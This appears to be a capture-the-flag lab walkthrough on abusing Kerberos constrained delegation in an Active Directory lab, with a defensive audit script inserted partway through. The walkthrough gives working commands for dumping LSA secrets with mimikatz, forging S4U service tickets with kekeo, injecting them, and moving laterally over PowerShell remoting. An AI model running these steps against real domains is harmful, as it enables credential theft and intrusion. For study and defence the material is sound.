To detect constrained delegation, use PowerView:

Import-Module .\PowerView.ps1
Get-NetUser -TrustedToAuth

If the command prints anything, the domain has accounts (users or computers) configured for constrained delegation with protocol transition enabled, i.e. they are trusted to request service tickets on behalf of other users to the services listed in their msDS-AllowedToDelegateTo attribute. If we have enough permissions, we can dump their credentials and use them for lateral movement.

Note

The below example assumes that the vulnerable user is a service account that can authenticate against HTTP and WSMAN on THMSERVER1.

With admin privileges on a compromised domain-joined machine, we can dump the delegation-enabled user's cleartext credentials from the LSA secrets (if the option "store passwords with reversible encryption" is enabled for that account).
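The two checks above (the PowerView query and the reversible-encryption condition) can be run from the defender's side with the RSAT ActiveDirectory module. The script below is an added example, not code from the original page or from PowerView; it assumes a domain-joined host with the ActiveDirectory module installed and read access to the directory, and it makes no changes. It lists every account with msDS-AllowedToDelegateTo set together with the two userAccountControl bits that matter here, and separately reports privileged accounts that are neither marked "sensitive and cannot be delegated" nor members of Protected Users, since those are the accounts that could be impersonated through S4U. The group names and flag values are documented Microsoft values, not page-specific identifiers.

```powershell
# Added audit script (not part of the original page). Read-only; requires the RSAT
# ActiveDirectory module and directory read access.
Import-Module ActiveDirectory

# userAccountControl bit flags (documented Microsoft values)
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # protocol transition ("use any authentication protocol")
$ENCRYPTED_TEXT_PWD_ALLOWED     = 0x80        # "store password using reversible encryption"
$NOT_DELEGATED                  = 0x100000    # "account is sensitive and cannot be delegated"

function Get-ConstrainedDelegationReport {
    # Every user or computer object that has a constrained-delegation target list.
    Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
        -Properties msDS-AllowedToDelegateTo, userAccountControl, servicePrincipalName |
    ForEach-Object {
        $uac = [int]$_.userAccountControl
        [PSCustomObject]@{
            Account              = $_.Name
            ObjectClass          = $_.ObjectClass
            DelegatesTo          = ($_.'msDS-AllowedToDelegateTo' -join '; ')
            ProtocolTransition   = [bool]($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION)
            ReversibleEncryption = [bool]($uac -band $ENCRYPTED_TEXT_PWD_ALLOWED)
        }
    }
}

function Get-UnprotectedPrivilegedAccounts {
    # Members of high-privilege groups that can still be delegated: not flagged
    # NOT_DELEGATED and not in Protected Users. These are the S4U impersonation targets
    # a defender should fix first.
    param([string[]]$Groups = @('Domain Admins', 'Enterprise Admins', 'Administrators'))

    $protected = Get-ADGroupMember -Identity 'Protected Users' -Recursive -ErrorAction SilentlyContinue |
                 Select-Object -ExpandProperty DistinguishedName

    foreach ($g in $Groups) {
        Get-ADGroupMember -Identity $g -Recursive |
            Where-Object { $_.objectClass -eq 'user' } |
            Get-ADUser -Properties userAccountControl |
            Where-Object {
                -not ($_.userAccountControl -band $NOT_DELEGATED) -and
                ($protected -notcontains $_.DistinguishedName)
            } |
            Select-Object @{ n = 'Group'; e = { $g } }, SamAccountName, DistinguishedName
    }
}

# Usage: an account that shows ProtocolTransition = True is the case this page describes;
# ReversibleEncryption = True is the condition under which its cleartext password is recoverable.
Get-ConstrainedDelegationReport   | Format-Table -AutoSize
Get-UnprotectedPrivilegedAccounts | Format-Table -AutoSize
```

The remediation for each row of the second report is to set "Account is sensitive and cannot be delegated" on the account or add it to Protected Users; for the first report, clear the reversible-encryption flag and review whether protocol transition is actually required for the listed services.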

.\mimikatz.exe "token::elevate" "lsadump::secrets" "exit"

Look for the cur/text field or, if it is absent, the NTLM fields. Then exit mimikatz so that the elevated token is not used in the following steps.

Use kekeo to request a TGT with the cleartext credentials, then use the service account's TGT to request a TGS for the admin user through S4U (since the svcIIS user has the SeImpersonate privilege).

kekeo # tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@
kekeo # tgs::s4u /tgt:<TGT .kirbi file written by tgt::ask> /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc
kekeo # tgs::s4u /tgt:<TGT .kirbi file written by tgt::ask> /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc

Use Mimikatz again to inject the TGS/service tickets into memory:

.\mimikatz.exe "privilege::debug" `
               "kerberos::ptt <TGS .kirbi file for http/THMSERVER1>" `
               "kerberos::ptt <TGS .kirbi file for wsman/THMSERVER1>" `
               "exit"

Use the injected tickets to authenticate for PowerShell remoting over WSMan:

New-PSSession -ComputerName thmserver1.za.tryhackme.loc
Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc

If PowerShell fails to create the session, close and reopen PowerShell, then reinject the tickets.